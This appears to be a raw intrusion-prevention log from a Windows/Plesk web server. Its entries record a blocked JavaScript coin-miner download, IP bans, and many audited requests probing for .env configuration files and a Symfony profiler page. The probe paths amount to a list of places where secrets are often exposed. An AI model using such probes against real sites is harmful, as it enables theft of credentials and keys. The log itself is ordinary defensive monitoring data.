mF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjoxODY4OCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA2NzYwNjc4MSwidWlkIjoiQjFDMkQ0MDctMDA3RC1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000c1e4	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770071706.8012120723724365234375			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000215	01dc9495bc4a9773	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc9495961aa479	01dc9495961aa479	00000001	00000000	Active Response that started at 2/3/2026 5:35:09 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003ba	01dc9497cff9b2ca	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497aad09735	01dc9497aad09735	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFBQ0ZBQTlFLTk0OTctMTFGMS04QTlFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cb9a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c1	01dc9497cff9b2ca	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497abf5dd93	01dc9497abf5dd93	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFCRjVCOTNCLTk0OTctMTFGMS04RDE5LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cba8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/portal/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c4	01dc9497d34ce340	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497ad591db3	01dc9497ad591db3	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFENTgzMTFBLTk0OTctMTFGMS04REFFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cbb2	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/new/.env.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003cb	01dc9497d34ce340	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497ade36767	01dc9497ade36767	00000001	00000128	[SID: 33269] Audit: Possible Misconfigured Symfony Application attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFERTI3QUNELTk0OTctMTFGMS04REU4LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMyNjksIm5hbWUiOiJBdWRpdDogUG9zc2libGUgTWlzY29uZmlndXJlZCBTeW1mb255IEFwcGxpY2F0aW9uIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000081f5	00010000	00000002	00000002	0000cbb2	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Possible Misconfigured Symfony Application	http://ftp.miracruises.com/_profiler/phpinfo			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c2	01dc9497d34ce340	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497ae963867	01dc9497ae963867	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFFOTJFQjFDLTk0OTctMTFGMS04QzMyLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cbb2	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/awstats/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9497d6a01081	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497b0c8ee4a	01dc9497b0c8ee4a	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkIwQzVCN0EyLTk0OTctMTFGMS04RjFFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000999e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/cron/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003be	01dc9497d6a01081	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497b195f9ea	01dc9497b195f9ea	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkIxOTUyNThELTk0OTctMTFGMS04Rjc1LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000999e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/www/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c2	01dc9497d9ed8047	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497b471f02e	01dc9497b471f02e	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkI0NkY3QzkzLTk0OTctMTFGMS04RUE3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000b81a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/.vscode/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c0	01dc9497dd40acfa	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497b707880a	01dc9497b707880a	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkI3MDY5QjZCLTk0OTctMTFGMS04MUJELTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000b820	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/xampp/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9497e093d92b	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497b9841e1a	01dc9497b9841e1a	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkI5ODQwOUJBLTk0OTctMTFGMS04MEM4LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000b828	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/main/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c7	01dc9497e093d92b	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497bb1e3489	01dc9497bb1e3489	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkJCMUQ4MzY4LTk0OTctMTFGMS04Mzc0LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00009856	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/node_modules/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9497e3e72625	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497bd1547fc	01dc9497bd1547fc	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkJEMTQ1QjVBLTk0OTctMTFGMS04MjQ3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000985e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/prod/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003be	01dc9497e3e72625	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497be60b5e6	01dc9497be60b5e6	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkJFNUUxMUQxLTk0OTctMTFGMS04MkQxLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000986c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/.env.bak			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c2	01dc9497e3e72625	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497bf02d753	01dc9497bf02d753	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkJGMDIxMkVGLTk0OTctMTFGMS04NTE2LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000986c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/website/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c2	01dc9497ea8e5cdb	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497c3b47e2d	01dc9497c3b47e2d	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkMzQjQzRDA4LTk0OTctMTFGMS04NzBFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000aa2c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/backend/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003cb	01dc9497ea8e5cdb	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497c510974f	01dc9497c510974f	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkM1MEQ3MDdBLTk0OTctMTFGMS04NzlGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000aa2c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/.env.production.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c0	01dc9497ea8e5cdb	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497c67d590d	01dc9497c67d590d	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkM2N0IzMDkxLTk0OTctMTFGMS04NjM4LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000aa2c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/.env.stage			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003be	01dc9497eddba648	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc9497c8058520	01dc9497c8058520	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkM4MDU2M0Y4LTk0OTctMTFGMS04NkRFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000c38a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.miracruises.com/.env.old			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc94983a486ccb	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc94983851583e	01dc94999df2143e	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 6:04:01 AM to 2/3/2026 6:14:01 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000da9	01dc9498622cd29a	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc949837ef978a	01dc94983e0e1eaf	00000003	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjE5Njg4LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDczMjc3NzE4LCJ1aWQiOiIzQzQ1NDhEOC0wMDdFLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiIzRTBCMEFBNS05NDk4LTExRjEtODg1RS0wMDE1NUQwNTc4MEMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG1hMTUxM2UyMi0zMzFjLTQ0NDgtYjExZS00OGMxNmVlYWJiNTYgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjoxODY4OCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA2NzYwNjc4MSwidWlkIjoiQjFDMkQ0MDctMDA3RC1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000e9c5	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-content/themes/structure/images/logo.png			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000213	01dc9498faff1de6	000000cf	00000007	164a8367	d1938ec1	00000001	00000000	00000001	01dc9498fa74d49c	01dc949a6015909c	00000001	00000000	The client will block traffic from IP address 193.142.147.209 for the next 600 seconds (from 2/3/2026 6:09:27 AM to 2/3/2026 6:19:27 AM).
